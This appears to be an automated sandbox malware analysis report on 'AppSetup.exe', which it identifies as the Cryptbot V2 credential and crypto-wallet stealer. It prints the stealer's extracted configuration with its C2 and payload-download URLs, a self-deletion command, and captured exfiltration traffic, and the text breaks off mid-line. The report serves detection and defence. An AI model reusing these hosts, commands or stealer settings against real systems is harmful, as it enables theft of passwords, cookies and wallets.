
Windows Analysis Report
AppSetup.exe

Overview

General Information

Sample Name: AppSetup.exe
Analysis ID: 805090
MD5: ac6538187dc00e537682c8439edecd02
SHA1: 1fd298681f569a63ed5a202fada86192a60858d4
SHA256: 134ee19e860f2c229787a6e2b954c79bde7831e4865f27c00ca9c84fcb0e2c1f
Tags: exe

Detection

Cryptbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Cryptbot
Yara detected CryptbotV2
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Hides threads from debuggers
Overwrites code with unconditional jumps - possibly setting hooks in a foreign process
Tries to detect sandboxes and other dynamic analysis tools (window names)
Self deletion via cmd or bat file
Query firmware table information (likely to detect VMs)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Found C&C like URL pattern
Tries to evade analysis by executing a special instruction (VM detection)
Tries to detect virtualization through RDTSC time measurements
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
PE file contains section with special chars
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the installation date of Windows
Internet Provider seen in connection with other malware
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Entry point lies outside standard sections
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Queries information about the installed CPU (vendor, model number etc)
Queries the product ID of Windows
Sample file is different than original file name gathered from version info
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
PE file contains an invalid checksum
Drops PE files
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • AppSetup.exe (PID: 4908 cmdline: C:\Users\user\Desktop\AppSetup.exe MD5: AC6538187DC00E537682C8439EDECD02)
    • cmd.exe (PID: 5276 cmdline: "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\31A8B1A9C8493D8F\isotac.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 4780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • isotac.exe (PID: 1952 cmdline: C:\Users\user\AppData\Roaming\31A8B1A9C8493D8F\isotac.exe MD5: D3807676A1CA921785102367C6BD838F)
        • DpEditor.exe (PID: 5484 cmdline: C:\Users\user\AppData\Roaming\NCH Software\DrawPad\DpEditor.exe MD5: D3807676A1CA921785102367C6BD838F)
    • cmd.exe (PID: 1116 cmdline: C:\Windows\System32\cmd.exe" /c timeout -t 5 && del "C:\Users\user\Desktop\AppSetup.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 1788 cmdline: timeout -t 5 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
  • cleanup
{"C2 list": ["http://trenio65.top/gate.php"], "ChromeExt": "true", "HistoryEdge": "false", "HistoryChrome": "false", "Desktop": "true", "Files": "false", "CookiesOpera": "false", "EdgeDB": "true", "Opera": "false", "Chrome": "false", "Screenshot": "true", "CookiesFirefox": "false", "HistoryFirefox": "false", "Info": "true", "CookiesChrome": "false", "CookiesEdge": "false", "ChromeDB": "true", "FirefoxDB": "true", "EdgeExt": "true", "Wallet": "true", "HistoryOpera": "false", "Edge": "false", "Firefox": "false", "NTFS": "true", "PasswordFile": "_AllPasswords.txt", "InfoFile": "_Information.txt", "EdgeDBFolder": "_Edge", "ChromeDBFolder": "_Chrome", "DesktopFolder": "_Desktop", "UserAgent": "", "UAC": "true", "ExternalDownload": "http://yepugi08.top/isotac.dat", "DeleteAfterEnd": "true", "FirefoxDBFolder": "_Firefox", "ScreenFile": "$CREEN.PNG", "Prefix": "mrd-", "MessageAfterEnd": "false", "HistoryFile": "_AllHistory.txt", "FilesFolder": "_Files", "CookiesFile": "_AllCookies.txt", "Anti": "false", "WalletFolder": "_Wallet"}
Yara matches in memory dumps (Source | Rule | Description | Author):
Source: 00000000.00000002.283566831.000000000103D000.00000004.00000001.01000000.00000003.sdmp | Rule: JoeSecurity_CryptbotV2 | Description: Yara detected CryptbotV2 | Author: Joe Security
Source: 00000000.00000003.256932747.000000000215F000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_CryptbotV2 | Description: Yara detected CryptbotV2 | Author: Joe Security
Source: 00000000.00000003.255701367.000000000215A000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_CryptbotV2 | Description: Yara detected CryptbotV2 | Author: Joe Security
Source: 00000000.00000003.255772726.000000000215F000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_CryptbotV2 | Description: Yara detected CryptbotV2 | Author: Joe Security
Source: 00000000.00000003.263986675.000000000215F000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_CryptbotV2 | Description: Yara detected CryptbotV2 | Author: Joe Security
Yara matches in unpacked PE files (Source | Rule | Description | Author):
Source: 0.2.AppSetup.exe.f70000.0.unpack | Rule: JoeSecurity_CryptbotV2 | Description: Yara detected CryptbotV2 | Author: Joe Security
No Sigma rule has matched

Snort IDS alerts (Timestamp | Source IP | Destination IP | Source Port | Destination Port | Protocol | SID | Classtype):
02/12/23-00:10:13.688745 | 192.168.2.3 | 171.22.30.179 | 49703 | 80 | TCP | 2017930 | A Network Trojan was detected
02/12/23-00:10:13.688745 | 192.168.2.3 | 171.22.30.179 | 49703 | 80 | TCP | 2022985 | A Network Trojan was detected
02/12/23-00:10:13.635837 | 192.168.2.3 | 8.8.8.8 | 57840 | 53 | UDP | 2023883 | Potentially Bad Traffic


AV Detection

Source: AppSetup.exe | ReversingLabs: Detection: 28%
Source: AppSetup.exe | Virustotal: Detection: 26%
Source: C:\Users\user\AppData\Roaming\31A8B1A9C8493D8F\isotac.exe | ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Roaming\NCH Software\DrawPad\DpEditor.exe | ReversingLabs: Detection: 76%
Source: 11.2.DpEditor.exe.9a0000.0.unpack | Avira: Label: TR/Crypt.XPACK.Gen2
Source: 3.2.isotac.exe.9b0000.0.unpack | Avira: Label: TR/Crypt.XPACK.Gen2
Source: 00000000.00000002.283566831.000000000103D000.00000004.00000001.01000000.00000003.sdmp | Malware Configuration Extractor: Cryptbot V2 {"C2 list": ["http://trenio65.top/gate.php"], "ChromeExt": "true", "HistoryEdge": "false", "HistoryChrome": "false", "Desktop": "true", "Files": "false", "CookiesOpera": "false", "EdgeDB": "true", "Opera": "false", "Chrome": "false", "Screenshot": "true", "CookiesFirefox": "false", "HistoryFirefox": "false", "Info": "true", "CookiesChrome": "false", "CookiesEdge": "false", "ChromeDB": "true", "FirefoxDB": "true", "EdgeExt": "true", "Wallet": "true", "HistoryOpera": "false", "Edge": "false", "Firefox": "false", "NTFS": "true", "PasswordFile": "_AllPasswords.txt", "InfoFile": "_Information.txt", "EdgeDBFolder": "_Edge", "ChromeDBFolder": "_Chrome", "DesktopFolder": "_Desktop", "UserAgent": "", "UAC": "true", "ExternalDownload": "http://yepugi08.top/isotac.dat", "DeleteAfterEnd": "true", "FirefoxDBFolder": "_Firefox", "ScreenFile": "$CREEN.PNG", "Prefix": "mrd-", "MessageAfterEnd": "false", "HistoryFile": "_AllHistory.txt", "FilesFolder": "_Files", "CookiesFile": "_AllCookies.txt", "Anti": "false", "WalletFolder": "_Wallet"}
Source: AppSetup.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 142.250.184.100:443 -> 192.168.2.3:49700 version: TLS 1.2
Source: AppSetup.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\AppSetup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\AppSetup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Desktop\AppSetup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\Desktop\AppSetup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Users\user\Desktop\AppSetup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\AppSetup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\

Networking

Source: Traffic | Snort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.3:57840 -> 8.8.8.8:53
Source: Traffic | Snort IDS: 2022985 ET TROJAN Trojan Generic - POST To gate.php with no accept headers 192.168.2.3:49703 -> 171.22.30.179:80
Source: Traffic | Snort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49703 -> 171.22.30.179:80
Source: global traffic | HTTP traffic detected:
  POST /gate.php HTTP/1.1
  Content-Type: multipart/form-data; boundary=wodoDh2Kz
  Host: trenio65.top
  Content-Length: 863486
  Cache-Control: no-cache
Source: Malware configuration extractor | URLs: http://trenio65.top/gate.php
Source: Joe Sandbox View | ASN Name: CMCSUS
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic | HTTP traffic detected:
  GET / HTTP/1.1
  Host: www.google.com
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
  GET /isotac.dat HTTP/1.1
  Host: yepugi08.top
  Cache-Control: no-cache
Source: Joe Sandbox View | IP Address: 84.21.172.16
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown | Network traffic detected: HTTP traffic on port 49700 -> 443
Source: AppSetup.exe | String found in binary or memory: Content-Length: Content-Type: multipart/form-data;boundary=httphttpstrue<>S-1-5-18[<apis.google.com>]/[<443>][<www.google.com>][<"facebook">][<www.facebook.com>][<TEMP>][<APPDATA>][<LOCALAPPDATA>][<USERPROFILE>];[<ExternalDownload>][<Anti>][<true>][<UserAgent>][<UAC>]runas[<NTFS>][<Prefix>][<UID: >][<UserName: >][<ComputerName: >][<Info>][<OS: >][<DateTime: >][<UserAgent: >][<Keyboard Languages: >][<Display Resolution: >][<CPU: >][<RAM: >][<GPU: >][<isGodMod: yes>][<isGodMod: no>][<isAdmin: yes>][<isAdmin: no>][<Installed software:>][<Disk:>][<Process:>][<Screenshot>][<InfoFile>][<ScreenFile>][<PasswordFile>][<ChromeDBFolder>][<ChromeExt>][<WalletFolder>][<_Chrome_profile>][<EdgeDB>][<EdgeDBFolder>][<EdgeExt>][<_Edge_profile>][<Desktop>][<DesktopFolder>][<.txt>][<Wallet>]_test.err://[<80>][<OK>][< /c >][<cmd>][<open>][<MessageAfterEnd>][<System Error>][<The application was unable to start correctly (0xc000007b). Click OK to close the application.>][<DeleteAfterEnd>][< /c timeout -t 5 && del ">]"stream endneed dictionaryfile errorstream errordata errorout of memorybuf errorversion errorparameter error equals www.facebook.com (Facebook)
Source: AppSetup.exe | String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: AppSetup.exe, 00000000.00000003.253974562.0000000002160000.00000004.00000020.00020000.00000000.sdmp, AppSetup.exe, 00000000.00000003.256932747.000000000215F000.00000004.00000020.00020000.00000000.sdmp, AppSetup.exe, 00000000.00000003.255701367.000000000215A000.00000004.00000020.00020000.00000000.sdmp, AppSetup.exe, 00000000.00000003.255772726.000000000215F000.00000004.00000020.00020000.00000000.sdmp, AppSetup.exe, 00000000.00000003.263986675.000000000215F000.00000004.00000020.00020000.00000000.sdmp, AppSetup.exe, 00000000.00000003.253936113.000000000215D000.00000004.00000020.00020000.00000000.sdmp, AppSetup.exe, 00000000.00000002.289740157.0000000002141000.00000004.00000020.00020000.00000000.sdmp, AppSetup.exe, 00000000.00000003.256907405.000000000215D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: AppSetup.exe, 00000000.00000003.282993835.0000000003C2C000.00000004.00000020.00020000.00000000.sdmp, AppSetup.exe, 00000000.00000003.283081330.0000000003C2C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://iptc.tc4xmp
Source: AppSetup.exe, 00000000.00000003.282993835.0000000003C2C000.00000004.00000020.00020000.00000000.sdmp, AppSetup.exe, 00000000.00000003.283081330.0000000003C2C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ns.ado/Ident
Source: AppSetup.exe, 00000000.00000003.253936113.000000000215D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://schema.org/WebPage
Source: AppSetup.exe, 00000000.00000003.256932747.000000000215F000.00000004.00000020.00020000.00000000.sdmp, AppSetup.exe, 00000000.00000003.255701367.000000000215A000.00000004.00000020.00020000.00000000.sdmp, AppSetup.exe, 00000000.00000003.255772726.000000000215F000.00000004.00000020.00020000.00000000.sdmp, AppSetup.exe, 00000000.00000003.263986675.000000000215F000.00000004.00000020.00020000.00000000.sdmp, AppSetup.exe, 00000000.00000002.289740157.0000000002141000.00000004.00000020.00020000.00000000.sdmp, AppSetup.exe, 00000000.00000003.256907405.000000000215D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://trenio65.top/gate.php
Source: AppSetup.exe, 00000000.00000002.283566831.000000000103D000.00000004.00000001.01000000.00000003.sdmp | String found in binary or memory: http://trenio65.top/gate.php;
Source: AppSetup.exe, 00000000.00000002.283566831.000000000103D000.00000004.00000001.01000000.00000003.sdmp | String found in binary or memory: http://trenio65.top/gate.php;ChromeExt
Source: AppSetup.exe, 00000000.00000002.289740157.0000000002141000.00000004.00000020.00020000.00000000.sdmp, AppSetup.exe, 00000000.00000003.256907405.000000000215D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://yepugi08.top/isotac.dat
Source: AppSetup.exe, 00000000.00000003.256961512.0000000002141000.00000004.00000020.00020000.00000000.sdmp, AppSetup.exe, 00000000.00000003.255849617.0000000002141000.00000004.00000020.00020000.00000000.sdmp, AppSetup.exe, 00000000.00000002.289740157.0000000002141000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://yepugi08.top/isotac.dat(4
Source: D7F.tmp.0.dr | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: AppSetup.exe, 00000000.00000003.263986675.00000000021AC000.00000004.00000020.00020000.00000000.sdmp, AppSetup.exe, 00000000.00000003.262416299.00000000021AE000.00000004.00000020.00020000.00000000.sdmp, AppSetup.exe, 00000000.00000003.255667847.00000000021B3000.00000004.00000020.00020000.00000000.sdmp, AppSetup.exe, 00000000.00000003.260529834.00000000021AE000.00000004.00000020.00020000.00000000.sdmp, AppSetup.exe, 00000000.00000002.289740157.00000000021AC000.00000004.00000020.00020000.00000000.sdmp, AppSetup.exe, 00000000.00000003.253868681.000000000219F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://apis.google.com
Source: D7F.tmp.0.dr | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: D7F.tmp.0.dr | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: AppSetup.exe, 00000000.00000002.291131567.0000000004CCF000.00000004.00000020.00020000.00000000.sdmp, AppSetup.exe, 00000000.00000003.258253566.0000000004D5F000.00000004.00000020.00020000.00000000.sdmp, D7F.tmp.0.dr | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: D7F.tmp.0.dr | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: AppSetup.exe, 00000000.00000003.253868681.000000000219F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24
Source: AppSetup.exe, 00000000.00000003.263986675.00000000021AC000.00000004.00000020.00020000.00000000.sdmp, AppSetup.exe, 00000000.00000003.262416299.00000000021AE000.00000004.00000020.00020000.00000000.sdmp, AppSetup.exe, 00000000.00000003.255667847.00000000021B3000.00000004.00000020.00020000.00000000.sdmp, AppSetup.exe, 00000000.00000003.260529834.00000000021AE000.00000004.00000020.00020000.00000000.sdmp, AppSetup.exe, 00000000.00000002.289740157.00000000021AC000.00000004.00000020.00020000.00000000.sdmp, AppSetup.exe, 00000000.00000003.253868681.000000000219F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96
Source: AppSetup.exe, 00000000.00000002.291131567.0000000004CCF000.00000004.00000020.00020000.00000000.sdmp, AppSetup.exe, 00000000.00000003.258253566.0000000004D5F000.00000004.00000020.00020000.00000000.sdmp, D7F.tmp.0.dr | String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: AppSetup.exe, 00000000.00000002.291131567.0000000004CCF000.00000004.00000020.00020000.00000000.sdmp, AppSetup.exe, 00000000.00000003.258253566.0000000004D5F000.00000004.0